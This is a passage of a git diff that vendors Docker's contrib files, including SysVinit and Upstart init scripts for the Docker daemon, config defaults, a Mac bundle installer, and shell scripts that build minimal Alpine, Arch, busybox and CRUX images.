+
+if [ -f /etc/default/$BASE ]; then
+	. /etc/default/$BASE
+fi
+
+# Check docker is present
+if [ ! -x $DOCKERD ]; then
+	log_failure_msg "$DOCKERD not present or not executable"
+	exit 1
+fi
+
+check_init() {
+	# see also init_is_upstart in /lib/lsb/init-functions (which isn't available in Ubuntu 12.04, or we'd use it directly)
+	if [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; then
+		log_failure_msg "$DOCKER_DESC is managed via upstart, try using service $BASE $1"
+		exit 1
+	fi
+}
+
+fail_unless_root() {
+	if [ "$(id -u)" != '0' ]; then
+		log_failure_msg "$DOCKER_DESC must be run as root"
+		exit 1
+	fi
+}
+
+cgroupfs_mount() {
+	# see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount
+	if grep -v '^#' /etc/fstab | grep -q cgroup \
+		|| [ ! -e /proc/cgroups ] \
+		|| [ ! -d /sys/fs/cgroup ]; then
+		return
+	fi
+	if ! mountpoint -q /sys/fs/cgroup; then
+		mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup
+	fi
+	(
+		cd /sys/fs/cgroup
+		for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do
+			mkdir -p $sys
+			if ! mountpoint -q $sys; then
+				if ! mount -n -t cgroup -o $sys cgroup $sys; then
+					rmdir $sys || true
+				fi
+			fi
+		done
+	)
+}
+
+case "$1" in
+	start)
+		check_init
+		
+		fail_unless_root
+
+		cgroupfs_mount
+
+		touch "$DOCKER_LOGFILE"
+		chgrp docker "$DOCKER_LOGFILE"
+
+		ulimit -n 1048576
+
+		# Having non-zero limits causes performance problems due to accounting overhead
+		# in the kernel. We recommend using cgroups to do container-local accounting.
+		if [ "$BASH" ]; then
+			ulimit -u unlimited
+		else
+			ulimit -p unlimited
+		fi
+
+		log_begin_msg "Starting $DOCKER_DESC: $BASE"
+		start-stop-daemon --start --background \
+			--no-close \
+			--exec "$DOCKERD" \
+			--pidfile "$DOCKER_SSD_PIDFILE" \
+			--make-pidfile \
+			-- \
+				-p "$DOCKER_PIDFILE" \
+				$DOCKER_OPTS \
+					>> "$DOCKER_LOGFILE" 2>&1
+		log_end_msg $?
+		;;
+
+	stop)
+		check_init
+		fail_unless_root
+		log_begin_msg "Stopping $DOCKER_DESC: $BASE"
+		start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10
+		log_end_msg $?
+		;;
+
+	restart)
+		check_init
+		fail_unless_root
+		docker_pid=`cat "$DOCKER_SSD_PIDFILE" 2>/dev/null`
+		[ -n "$docker_pid" ] \
+			&& ps -p $docker_pid > /dev/null 2>&1 \
+			&& $0 stop
+		$0 start
+		;;
+
+	force-reload)
+		check_init
+		fail_unless_root
+		$0 restart
+		;;
+
+	status)
+		check_init
+		status_of_proc -p "$DOCKER_SSD_PIDFILE" "$DOCKERD" "$DOCKER_DESC"
+		;;
+
+	*)
+		echo "Usage: service docker {start|stop|restart|status}"
+		exit 1
+		;;
+esac
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default
new file mode 100644
index 0000000000..c4e93199b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default
@@ -0,0 +1,20 @@
+# Docker Upstart and SysVinit configuration file
+
+#
+# THIS FILE DOES NOT APPLY TO SYSTEMD
+#
+#   Please see the documentation for "systemd drop-ins":
+#   https://docs.docker.com/engine/admin/systemd/
+#
+
+# Customize location of Docker binary (especially for development testing).
+#DOCKERD="/usr/local/bin/dockerd"
+
+# Use DOCKER_OPTS to modify the daemon startup options.
+#DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4"
+
+# If you need Docker to use an HTTP proxy, it can also be specified here.
+#export http_proxy="http://127.0.0.1:3128/"
+
+# This is also a handy place to tweak where Docker's temporary files go.
+#export DOCKER_TMPDIR="/mnt/bigdrive/docker-tmp"
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker
new file mode 100755
index 0000000000..df9b02a2a4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker
@@ -0,0 +1,153 @@
+#!/bin/sh
+#
+#       /etc/rc.d/init.d/docker
+#
+#       Daemon for docker.com
+#
+# chkconfig:   2345 95 95
+# description: Daemon for docker.com
+
+### BEGIN INIT INFO
+# Provides:       docker
+# Required-Start: $network cgconfig
+# Required-Stop:
+# Should-Start:
+# Should-Stop:
+# Default-Start: 2 3 4 5
+# Default-Stop:  0 1 6
+# Short-Description: start and stop docker
+# Description: Daemon for docker.com
+### END INIT INFO
+
+# Source function library.
+. /etc/rc.d/init.d/functions
+
+prog="docker"
+unshare=/usr/bin/unshare
+exec="/usr/bin/dockerd"
+pidfile="/var/run/$prog.pid"
+lockfile="/var/lock/subsys/$prog"
+logfile="/var/log/$prog"
+
+[ -e /etc/sysconfig/$prog ] && . /etc/sysconfig/$prog
+
+prestart() {
+	service cgconfig status > /dev/null
+
+	if [[ $? != 0 ]]; then
+		service cgconfig start
+	fi
+
+}
+
+start() {
+	if [ ! -x $exec ]; then
+		if [ ! -e $exec ]; then
+			echo "Docker executable $exec not found"
+		else
+			echo "You do not have permission to execute the Docker executable $exec"
+		fi
+		exit 5
+	fi
+
+	check_for_cleanup
+
+	if ! [ -f $pidfile ]; then
+		prestart
+		printf "Starting $prog:\t"
+		echo "\n$(date)\n" >> $logfile
+		"$unshare" -m -- $exec $other_args >> $logfile 2>&1 &
+		pid=$!
+		touch $lockfile
+		# wait up to 10 seconds for the pidfile to exist.  see
+		# https://github.com/docker/docker/issues/5359
+		tries=0
+		while [ ! -f $pidfile -a $tries -lt 10 ]; do
+			sleep 1
+			tries=$((tries + 1))
+			echo -n '.'
+		done
+		if [ ! -f $pidfile ]; then
+			failure
+			echo
+			exit 1
+		fi
+		success
+		echo
+	else
+		failure
+		echo
+		printf "$pidfile still exists...\n"
+		exit 7
+	fi
+}
+
+stop() {
+	echo -n $"Stopping $prog: "
+	killproc -p $pidfile -d 300 $prog
+	retval=$?
+	echo
+	[ $retval -eq 0 ] && rm -f $lockfile
+	return $retval
+}
+
+restart() {
+	stop
+	start
+}
+
+reload() {
+	restart
+}
+
+force_reload() {
+	restart
+}
+
+rh_status() {
+	status -p $pidfile $prog
+}
+
+rh_status_q() {
+	rh_status >/dev/null 2>&1
+}
+
+
+check_for_cleanup() {
+	if [ -f ${pidfile} ]; then
+		/bin/ps -fp $(cat ${pidfile}) > /dev/null || rm ${pidfile}
+	fi
+}
+
+case "$1" in
+	start)
+		rh_status_q && exit 0
+		$1
+		;;
+	stop)
+		rh_status_q || exit 0
+		$1
+		;;
+	restart)
+		$1
+		;;
+	reload)
+		rh_status_q || exit 7
+		$1
+		;;
+	force-reload)
+		force_reload
+		;;
+	status)
+		rh_status
+		;;
+	condrestart|try-restart)
+		rh_status_q || exit 0
+		restart
+		;;
+	*)
+		echo $"Usage: $0 {start|stop|status|restart|condrestart|try-restart|reload|force-reload}"
+		exit 2
+esac
+
+exit $?
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig
new file mode 100644
index 0000000000..0864b3d77f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig
@@ -0,0 +1,7 @@
+# /etc/sysconfig/docker
+#
+# Other arguments to pass to the docker daemon process
+# These will be parsed by the sysv initscript and appended
+# to the arguments list passed to docker daemon
+
+other_args=""
diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS
new file mode 100644
index 0000000000..03ee2dde3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS
@@ -0,0 +1,2 @@
+Tianon Gravi <admwiggin@gmail.com> (@tianon)
+Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf
new file mode 100644
index 0000000000..d58f7d6ac8
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf
@@ -0,0 +1,72 @@
+description "Docker daemon"
+
+start on (filesystem and net-device-up IFACE!=lo)
+stop on runlevel [!2345]
+
+limit nofile 524288 1048576
+
+# Having non-zero limits causes performance problems due to accounting overhead
+# in the kernel. We recommend using cgroups to do container-local accounting.
+limit nproc unlimited unlimited
+
+respawn
+
+kill timeout 20
+
+pre-start script
+	# see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount
+	if grep -v '^#' /etc/fstab | grep -q cgroup \
+		|| [ ! -e /proc/cgroups ] \
+		|| [ ! -d /sys/fs/cgroup ]; then
+		exit 0
+	fi
+	if ! mountpoint -q /sys/fs/cgroup; then
+		mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup
+	fi
+	(
+		cd /sys/fs/cgroup
+		for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do
+			mkdir -p $sys
+			if ! mountpoint -q $sys; then
+				if ! mount -n -t cgroup -o $sys cgroup $sys; then
+					rmdir $sys || true
+				fi
+			fi
+		done
+	)
+end script
+
+script
+	# modify these in /etc/default/$UPSTART_JOB (/etc/default/docker)
+	DOCKERD=/usr/bin/dockerd
+	DOCKER_OPTS=
+	if [ -f /etc/default/$UPSTART_JOB ]; then
+		. /etc/default/$UPSTART_JOB
+	fi
+	exec "$DOCKERD" $DOCKER_OPTS --raw-logs
+end script
+
+# Don't emit "started" event until docker.sock is ready.
+# See https://github.com/docker/docker/issues/6647
+post-start script
+	DOCKER_OPTS=
+	DOCKER_SOCKET=
+	if [ -f /etc/default/$UPSTART_JOB ]; then
+		. /etc/default/$UPSTART_JOB
+	fi
+
+	if ! printf "%s" "$DOCKER_OPTS" | grep -qE -e '-H|--host'; then
+		DOCKER_SOCKET=/var/run/docker.sock
+	else
+		DOCKER_SOCKET=$(printf "%s" "$DOCKER_OPTS" | grep -oP -e '(-H|--host)\W*unix://\K(\S+)' | sed 1q)
+	fi
+
+	if [ -n "$DOCKER_SOCKET" ]; then
+		while ! [ -e "$DOCKER_SOCKET" ]; do
+			initctl status $UPSTART_JOB | grep -qE "(stop|respawn)/" && exit 1
+			echo "Waiting for $DOCKER_SOCKET"
+			sleep 0.1
+		done
+		echo "$DOCKER_SOCKET is up"
+	fi
+end script
diff --git a/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh
new file mode 100755
index 0000000000..2110d044d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh
@@ -0,0 +1,45 @@
+#!/bin/sh
+
+set -e
+
+errexit() {
+	echo "$1"
+	exit 1
+}
+
+[ "$(uname -s)" == "Darwin" ] || errexit "This script can only be used on a Mac"
+
+[ $# -eq 1 ] || errexit "Usage: $0 install|undo"
+
+BUNDLE="bundles/$(cat VERSION)"
+BUNDLE_PATH="$PWD/$BUNDLE"
+CLIENT_PATH="$BUNDLE_PATH/cross/darwin/amd64/docker"
+DATABASE="$HOME/Library/Containers/com.docker.docker/Data/database"
+DATABASE_KEY="$DATABASE/com.docker.driver.amd64-linux/bundle"
+
+[ -d "$DATABASE" ] || errexit "Docker for Mac must be installed for this script"
+
+case "$1" in
+"install")
+	[ -d "$BUNDLE" ] || errexit "cannot find bundle $BUNDLE"
+	[ -e "$CLIENT_PATH" ] || errexit "you need to run make cross first"
+	[ -e "$BUNDLE/binary-daemon/dockerd" ] || errexit "you need to build binaries first"
+	[ -f "$BUNDLE/binary-client/docker" ] || errexit "you need to build binaries first"
+	git -C "$DATABASE" reset --hard >/dev/null
+	echo "$BUNDLE_PATH" > "$DATABASE_KEY"
+	git -C "$DATABASE" add "$DATABASE_KEY"
+	git -C "$DATABASE" commit -m "update bundle to $BUNDLE_PATH"
+	rm -f /usr/local/bin/docker
+	cp "$CLIENT_PATH" /usr/local/bin
+	echo "Bundle installed. Restart Docker to use. To uninstall, reset Docker to factory defaults."
+	;;
+"undo")
+	git -C "$DATABASE" reset --hard >/dev/null
+	[ -f "$DATABASE_KEY" ] || errexit "bundle not set"
+	git -C "$DATABASE" rm "$DATABASE_KEY"
+	git -C "$DATABASE" commit -m "remove bundle"
+	rm -f /usr/local/bin/docker
+	ln -s "$HOME/Library/Group Containers/group.com.docker/bin/docker" /usr/local/bin
+	echo "Bundle removed. Using dev versions may cause issues, a reset to factory defaults is recommended."
+	;;
+esac
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
new file mode 100755
index 0000000000..47cd35ce62
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
@@ -0,0 +1,87 @@
+#!/bin/sh
+
+set -e
+
+[ $(id -u) -eq 0 ] || {
+	printf >&2 '%s requires root\n' "$0"
+	exit 1
+}
+
+usage() {
+	printf >&2 '%s: [-r release] [-m mirror] [-s]  [-c additional repository]\n' "$0"
+	exit 1
+}
+
+tmp() {
+	TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-XXXXXXXXXX)
+	ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-rootfs-XXXXXXXXXX)
+	trap "rm -rf $TMP $ROOTFS" EXIT TERM INT
+}
+
+apkv() {
+	curl -sSL $MAINREPO/$ARCH/APKINDEX.tar.gz | tar -Oxz |
+		grep --text '^P:apk-tools-static$' -A1 | tail -n1 | cut -d: -f2
+}
+
+getapk() {
+	curl -sSL $MAINREPO/$ARCH/apk-tools-static-$(apkv).apk |
+		tar -xz -C $TMP sbin/apk.static
+}
+
+mkbase() {
+	$TMP/sbin/apk.static --repository $MAINREPO --update-cache --allow-untrusted \
+		--root $ROOTFS --initdb add alpine-base
+}
+
+conf() {
+	printf '%s\n' $MAINREPO > $ROOTFS/etc/apk/repositories
+	printf '%s\n' $ADDITIONALREPO >> $ROOTFS/etc/apk/repositories
+}
+
+pack() {
+	local id
+	id=$(tar --numeric-owner -C $ROOTFS -c . | docker import - alpine:$REL)
+
+	docker tag $id alpine:latest
+	docker run -i -t --rm alpine printf 'alpine:%s with id=%s created!\n' $REL $id
+}
+
+save() {
+	[ $SAVE -eq 1 ] || return
+
+	tar --numeric-owner -C $ROOTFS -c . | xz > rootfs.tar.xz
+}
+
+while getopts "hr:m:s" opt; do
+	case $opt in
+		r)
+			REL=$OPTARG
+			;;
+		m)
+			MIRROR=$OPTARG
+			;;
+		s)
+			SAVE=1
+			;;
+		c)
+			ADDITIONALREPO=community
+			;;
+		*)
+			usage
+			;;
+	esac
+done
+
+REL=${REL:-edge}
+MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine}
+SAVE=${SAVE:-0}
+MAINREPO=$MIRROR/$REL/main
+ADDITIONALREPO=$MIRROR/$REL/community
+ARCH=${ARCH:-$(uname -m)}
+
+tmp
+getapk
+mkbase
+conf
+pack
+save
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf
new file mode 100644
index 0000000000..45fe03dc96
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf
@@ -0,0 +1,92 @@
+#
+# /etc/pacman.conf
+#
+# See the pacman.conf(5) manpage for option and repository directives
+
+#
+# GENERAL OPTIONS
+#
+[options]
+# The following paths are commented out with their default values listed.
+# If you wish to use different paths, uncomment and update the paths.
+#RootDir     = /
+#DBPath      = /var/lib/pacman/
+#CacheDir    = /var/cache/pacman/pkg/
+#LogFile     = /var/log/pacman.log
+#GPGDir      = /etc/pacman.d/gnupg/
+HoldPkg     = pacman glibc
+#XferCommand = /usr/bin/curl -C - -f %u > %o
+#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u
+#CleanMethod = KeepInstalled
+#UseDelta    = 0.7
+Architecture = auto
+
+# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup
+#IgnorePkg   =
+#IgnoreGroup =
+
+#NoUpgrade   =
+#NoExtract   =
+
+# Misc options
+#UseSyslog
+#Color
+#TotalDownload
+# We cannot check disk space from within a chroot environment
+#CheckSpace
+#VerbosePkgLists
+
+# By default, pacman accepts packages signed by keys that its local keyring
+# trusts (see pacman-key and its man page), as well as unsigned packages.
+SigLevel    = Required DatabaseOptional
+LocalFileSigLevel = Optional
+#RemoteFileSigLevel = Required
+
+# NOTE: You must run `pacman-key --init` before first using pacman; the local
+# keyring can then be populated with the keys of all official Arch Linux
+# packagers with `pacman-key --populate archlinux`.
+
+#
+# REPOSITORIES
+#   - can be defined here or included from another file
+#   - pacman will search repositories in the order defined here
+#   - local/custom mirrors can be added here or in separate files
+#   - repositories listed first will take precedence when packages
+#     have identical names, regardless of version number
+#   - URLs will have $repo replaced by the name of the current repo
+#   - URLs will have $arch replaced by the name of the architecture
+#
+# Repository entries are of the format:
+#       [repo-name]
+#       Server = ServerName
+#       Include = IncludePath
+#
+# The header [repo-name] is crucial - it must be present and
+# uncommented to enable the repo.
+#
+
+# The testing repositories are disabled by default. To enable, uncomment the
+# repo name header and Include lines. You can add preferred servers immediately
+# after the header, and they will be used before the default mirrors.
+
+#[testing]
+#Include = /etc/pacman.d/mirrorlist
+
+[core]
+Include = /etc/pacman.d/mirrorlist
+
+[extra]
+Include = /etc/pacman.d/mirrorlist
+
+#[community-testing]
+#Include = /etc/pacman.d/mirrorlist
+
+[community]
+Include = /etc/pacman.d/mirrorlist
+
+# An example of a custom package repository.  See the pacman manpage for
+# tips on creating your own repositories.
+#[custom]
+#SigLevel = Optional TrustAll
+#Server = file:///home/custompkgs
+
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch.sh b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh
new file mode 100755
index 0000000000..f941177122
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh
@@ -0,0 +1,126 @@
+#!/usr/bin/env bash
+# Generate a minimal filesystem for archlinux and load it into the local
+# docker as "archlinux"
+# requires root
+set -e
+
+hash pacstrap &>/dev/null || {
+	echo "Could not find pacstrap. Run pacman -S arch-install-scripts"
+	exit 1
+}
+
+hash expect &>/dev/null || {
+	echo "Could not find expect. Run pacman -S expect"
+	exit 1
+}
+
+
+export LANG="C.UTF-8"
+
+ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-archlinux-XXXXXXXXXX)
+chmod 755 $ROOTFS
+
+# packages to ignore for space savings
+PKGIGNORE=(
+    cryptsetup
+    device-mapper
+    dhcpcd
+    iproute2
+    jfsutils
+    linux
+    lvm2
+    man-db
+    man-pages
+    mdadm
+    nano
+    netctl
+    openresolv
+    pciutils
+    pcmciautils
+    reiserfsprogs
+    s-nail
+    systemd-sysvcompat
+    usbutils
+    vi
+    xfsprogs
+)
+IFS=','
+PKGIGNORE="${PKGIGNORE[*]}"
+unset IFS
+
+arch="$(uname -m)"
+case "$arch" in
+	armv*)
+		if pacman -Q archlinuxarm-keyring >/dev/null 2>&1; then
+			pacman-key --init
+			pacman-key --populate archlinuxarm
+		else
+			echo "Could not find archlinuxarm-keyring. Please, install it and run pacman-key --populate archlinuxarm"
+			exit 1
+		fi
+		PACMAN_CONF=$(mktemp ${TMPDIR:-/var/tmp}/pacman-conf-archlinux-XXXXXXXXX)
+		version="$(echo $arch | cut -c 5)"
+		sed "s/Architecture = armv/Architecture = armv${version}h/g" './mkimage-archarm-pacman.conf' > "${PACMAN_CONF}"
+		PACMAN_MIRRORLIST='Server = http://mirror.archlinuxarm.org/$arch/$repo'
+		PACMAN_EXTRA_PKGS='archlinuxarm-keyring'
+		EXPECT_TIMEOUT=1800 # Most armv* based devices can be very slow (e.g. RPiv1)
+		ARCH_KEYRING=archlinuxarm
+		DOCKER_IMAGE_NAME="armv${version}h/archlinux"
+		;;
+	*)
+		PACMAN_CONF='./mkimage-arch-pacman.conf'
+		PACMAN_MIRRORLIST='Server = https://mirrors.kernel.org/archlinux/$repo/os/$arch'
+		PACMAN_EXTRA_PKGS=''
+		EXPECT_TIMEOUT=60
+		ARCH_KEYRING=archlinux
+		DOCKER_IMAGE_NAME=archlinux
+		;;
+esac
+
+export PACMAN_MIRRORLIST
+
+expect <<EOF
+	set send_slow {1 .1}
+	proc send {ignore arg} {
+		sleep .1
+		exp_send -s -- \$arg
+	}
+	set timeout $EXPECT_TIMEOUT
+
+	spawn pacstrap -C $PACMAN_CONF -c -d -G -i $ROOTFS base haveged $PACMAN_EXTRA_PKGS --ignore $PKGIGNORE
+	expect {
+		-exact "anyway? \[Y/n\] " { send -- "n\r"; exp_continue }
+		-exact "(default=all): " { send -- "\r"; exp_continue }
+		-exact "installation? \[Y/n\]" { send -- "y\r"; exp_continue }
+		-exact "delete it? \[Y/n\]" { send -- "y\r"; exp_continue }
+	}
+EOF
+
+arch-chroot $ROOTFS /bin/sh -c 'rm -r /usr/share/man/*'
+arch-chroot $ROOTFS /bin/sh -c "haveged -w 1024; pacman-key --init; pkill haveged; pacman -Rs --noconfirm haveged; pacman-key --populate $ARCH_KEYRING; pkill gpg-agent"
+arch-chroot $ROOTFS /bin/sh -c "ln -s /usr/share/zoneinfo/UTC /etc/localtime"
+echo 'en_US.UTF-8 UTF-8' > $ROOTFS/etc/locale.gen
+arch-chroot $ROOTFS locale-gen
+arch-chroot $ROOTFS /bin/sh -c 'echo $PACMAN_MIRRORLIST > /etc/pacman.d/mirrorlist'
+
+# udev doesn't work in containers, rebuild /dev
+DEV=$ROOTFS/dev
+rm -rf $DEV
+mkdir -p $DEV
+mknod -m 666 $DEV/null c 1 3
+mknod -m 666 $DEV/zero c 1 5
+mknod -m 666 $DEV/random c 1 8
+mknod -m 666 $DEV/urandom c 1 9
+mkdir -m 755 $DEV/pts
+mkdir -m 1777 $DEV/shm
+mknod -m 666 $DEV/tty c 5 0
+mknod -m 600 $DEV/console c 5 1
+mknod -m 666 $DEV/tty0 c 4 0
+mknod -m 666 $DEV/full c 1 7
+mknod -m 600 $DEV/initctl p
+mknod -m 666 $DEV/ptmx c 5 2
+ln -sf /proc/self/fd $DEV/fd
+
+tar --numeric-owner --xattrs --acls -C $ROOTFS -c . | docker import - $DOCKER_IMAGE_NAME
+docker run --rm -t $DOCKER_IMAGE_NAME echo Success.
+rm -rf $ROOTFS
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf
new file mode 100644
index 0000000000..f4b45f54d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf
@@ -0,0 +1,98 @@
+#
+# /etc/pacman.conf
+#
+# See the pacman.conf(5) manpage for option and repository directives
+
+#
+# GENERAL OPTIONS
+#
+[options]
+# The following paths are commented out with their default values listed.
+# If you wish to use different paths, uncomment and update the paths.
+#RootDir     = /
+#DBPath      = /var/lib/pacman/
+#CacheDir    = /var/cache/pacman/pkg/
+#LogFile     = /var/log/pacman.log
+#GPGDir      = /etc/pacman.d/gnupg/
+HoldPkg     = pacman glibc
+#XferCommand = /usr/bin/curl -C - -f %u > %o
+#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u
+#CleanMethod = KeepInstalled
+#UseDelta    = 0.7
+Architecture = armv
+
+# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup
+#IgnorePkg   =
+#IgnoreGroup =
+
+#NoUpgrade   =
+#NoExtract   =
+
+# Misc options
+#UseSyslog
+#Color
+#TotalDownload
+# We cannot check disk space from within a chroot environment
+#CheckSpace
+#VerbosePkgLists
+
+# By default, pacman accepts packages signed by keys that its local keyring
+# trusts (see pacman-key and its man page), as well as unsigned packages.
+SigLevel    = Required DatabaseOptional
+LocalFileSigLevel = Optional
+#RemoteFileSigLevel = Required
+
+# NOTE: You must run `pacman-key --init` before first using pacman; the local
+# keyring can then be populated with the keys of all official Arch Linux
+# packagers with `pacman-key --populate archlinux`.
+
+#
+# REPOSITORIES
+#   - can be defined here or included from another file
+#   - pacman will search repositories in the order defined here
+#   - local/custom mirrors can be added here or in separate files
+#   - repositories listed first will take precedence when packages
+#     have identical names, regardless of version number
+#   - URLs will have $repo replaced by the name of the current repo
+#   - URLs will have $arch replaced by the name of the architecture
+#
+# Repository entries are of the format:
+#       [repo-name]
+#       Server = ServerName
+#       Include = IncludePath
+#
+# The header [repo-name] is crucial - it must be present and
+# uncommented to enable the repo.
+#
+
+# The testing repositories are disabled by default. To enable, uncomment the
+# repo name header and Include lines. You can add preferred servers immediately
+# after the header, and they will be used before the default mirrors.
+
+#[testing]
+#Include = /etc/pacman.d/mirrorlist
+
+[core]
+Include = /etc/pacman.d/mirrorlist
+
+[extra]
+Include = /etc/pacman.d/mirrorlist
+
+#[community-testing]
+#Include = /etc/pacman.d/mirrorlist
+
+[community]
+Include = /etc/pacman.d/mirrorlist
+
+[alarm]
+Include = /etc/pacman.d/mirrorlist
+
+[aur]
+Include = /etc/pacman.d/mirrorlist
+
+# An example of a custom package repository.  See the pacman manpage for
+# tips on creating your own repositories.
+#[custom]
+#SigLevel = Optional TrustAll
+#Server = file:///home/custompkgs
+
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
new file mode 100755
index 0000000000..b11a6bb265
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
@@ -0,0 +1,43 @@
+#!/usr/bin/env bash
+# Generate a very minimal filesystem based on busybox-static,
+# and load it into the local docker under the name "busybox".
+
+echo >&2
+echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static'
+echo >&2
+
+BUSYBOX=$(which busybox)
+[ "$BUSYBOX" ] || {
+    echo "Sorry, I could not locate busybox."
+    echo "Try 'apt-get install busybox-static'?"
+    exit 1
+}
+
+set -e
+ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM
+mkdir $ROOTFS
+cd $ROOTFS
+
+mkdir bin etc dev dev/pts lib proc sys tmp
+touch etc/resolv.conf
+cp /etc/nsswitch.conf etc/nsswitch.conf
+echo root:x:0:0:root:/:/bin/sh > etc/passwd
+echo root:x:0: > etc/group
+ln -s lib lib64
+ln -s bin sbin
+cp $BUSYBOX bin
+for X in $(busybox --list)
+do
+    ln -s busybox bin/$X
+done
+rm bin/init
+ln bin/busybox bin/init
+cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib
+cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib
+for X in console null ptmx random stdin stdout stderr tty urandom zero
+do
+    cp -a /dev/$X dev
+done
+
+tar --numeric-owner -cf- . | docker import - busybox
+docker run -i -u root busybox /bin/echo Success.
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-crux.sh b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh
new file mode 100755
index 0000000000..3f0bdcae3c
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh
@@ -0,0 +1,75 @@
+#!/usr/bin/env bash
+# Generate a minimal filesystem for CRUX/Linux and load it into the local
+# docker as "cruxlinux"
+# requires root and the crux iso (http://crux.nu)
+
+set -e
+
+die () {
+    echo >&2 "$@"
+    exit 1
+}
+
+[ "$#" -eq 1 ] || die "1 argument(s) required, $# provided. Usage: ./mkimage-crux.sh /path/to/iso"
+
+ISO=${1}
+
+ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-crux-XXXXXXXXXX)
+CRUX=$(mktemp -d ${TMPDIR:-/var/tmp}/crux-XXXXXXXXXX)
+TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/XXXXXXXXXX)
+
+VERSION=$(basename --suffix=.iso $ISO | sed 's/[^0-9.]*\([0-9.]*\).*/\1/')
+
+# Mount the ISO
+mount -o ro,loop $ISO $CRUX
+
+# Extract pkgutils
+tar -C $TMP -xf $CRUX/tools/pkgutils#*.pkg.tar.gz
+
+# Put pkgadd in the $PATH
+export PATH="$TMP/usr/bin:$PATH"
+
+# Install core packages
+mkdir -p $ROOTFS/var/lib/pkg
+touch $ROOTFS/var/lib/pkg/db
+for pkg in $CRUX/crux/core/*; do
+    pkgadd -r $ROOTFS $pkg
+done
+
+# Remove agetty and inittab config
+if (grep agetty ${ROOTFS}/etc/inittab 2>&1 > /dev/null); then
+    echo "Removing agetty from /etc/inittab ..."
+    chroot ${ROOTFS} sed -i -e "/agetty/d" /etc/inittab
+    chroot ${ROOTFS} sed -i -e "/shutdown/d" /etc/inittab
+    chroot ${ROOTFS} sed -i -e "/^$/N;/^\n$/d" /etc/inittab
+fi
+
+# Remove kernel source
+rm -rf $ROOTFS/usr/src/*
+
+# udev doesn't work in containers, rebuild /dev
+DEV=$ROOTFS/dev
+rm -rf $DEV
+mkdir -p $DEV
+mknod -m 666 $DEV/null c 1 3
+mknod -m 666 $DEV/zero c 1 5
+mknod -m 666 $DEV/random c 1 8
+mknod -m 666 $DEV/urandom c 1 9
+mkdir -m 755 $DEV/pts
+mkdir -m 1777 $DEV/shm
+mknod -m 666 $DEV/tty c 5 0
+mknod -m 600 $DEV/console c 5 1
+mknod -m 666 $DEV/tty0 c 4 0
+mknod -m 666 $DEV/full c 1 7
+mknod -m 600 $DEV/initctl p
